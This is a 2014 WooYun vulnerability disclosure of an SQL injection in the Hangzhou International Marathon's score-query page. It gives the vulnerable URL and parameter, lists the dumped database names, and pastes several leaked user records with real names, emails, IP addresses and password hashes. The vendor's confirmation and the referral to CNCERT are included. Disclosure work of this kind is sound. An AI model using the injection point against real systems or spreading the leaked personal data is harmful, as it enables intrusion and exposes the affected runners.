漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-052820
漏洞标题:杭州国际马拉松注入大量实名用户信息可能泄漏
相关厂商:杭州国际马拉松
漏洞作者: Mody
提交时间:2014-03-05 10:42
修复时间:2014-04-19 10:42
公开时间:2014-04-19 10:42
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:10
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-03-05: 细节已通知厂商并且等待厂商处理中
2014-03-10: 厂商已经确认,细节仅向厂商公开
2014-03-20: 细节向核心白帽子及相关领域专家公开
2014-03-30: 细节向普通白帽子公开
2014-04-09: 细节向实习白帽子公开
2014-04-19: 细节向公众公开
简要描述:
可以转到cncert吗?
详细说明:
成绩查询处存在注入,而且数据库里都是实名信息啊,亲,不带这样的,报个马拉松,真实姓名就进社工库了。。。
url: http://www.hzim.org/sign/score.php?type=csh&idnum=1
参数:idnum
漏洞证明:
[*] information_schema
[*] rdmls
[*] rdmls2011
[*] rdmls2013
[*] rdmlstest
[*] test
一个rdmls2013数据库里有的用户有18000个,四个数据库,5W多的用户数据
因为杭州马拉松报名是实名制,所以5W的信息里包括用户的真实姓名,邮箱,密码,危害巨大
| 40352 | 2013-10-10 09:54:38 | 1 | 戴子禾 | 635212486@qq.com | 4 | <blank> | NULL | <blank> | 1 | <blank> | NULL | NULL | 111.0.114.195 | <blank> | ffd65f2399168d3d49bed7b99952f259 | <blank> | 0 | <blank> | 0000-00-00 00:00:00 | NULL |
| 40353 | 2013-10-10 09:57:25 | 2 | 朱麟超123 | 870545340@qq.com | 3 | <blank> | NULL | <blank> | 1 | <blank> | NULL | NULL | 183.144.118.250 | <blank> | 08d5d9f1ce005d97f237de5365e83013 | <blank> | 0 | <blank> | 2013-10-10 10:04:07 | NULL |
| 40354 | 2013-10-10 09:57:27 | 3 | jianhesuibo | jianhesuibo@163.com | 3 | <blank> | NULL | <blank> | 1 | <blank> | NULL | NULL | 60.186.23.119 | <blank> | ec53205427c7636dd0e4110df0681234 | <blank> | 0 | <blank> | 2013-10-10 18:41:17 | NULL |
| 40355 | 2013-10-10 09:58:52 | 1 | 吴洁洁 | 437669841@qq.com | 3 | <blank> | NULL | <blank> | 1 | <blank> | NULL | NULL | 115.236.29.18 | <blank> | 46b25f3449aca11518fb105d1c4264d7 | <blank> | 0 | <blank> | 0000-00-00 00:00:00 | NULL |
实名信息啊,有木有,亲!!!
修复方案:
过滤
版权声明:转载请注明来源 Mody@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:14
确认时间:2014-03-10 15:05
厂商回复:
已经转由CNCERT下发给浙江分中心,由其后续尝试协调网站管理单位处置。涉及数据泄露风险,rank 14
最新状态:
暂无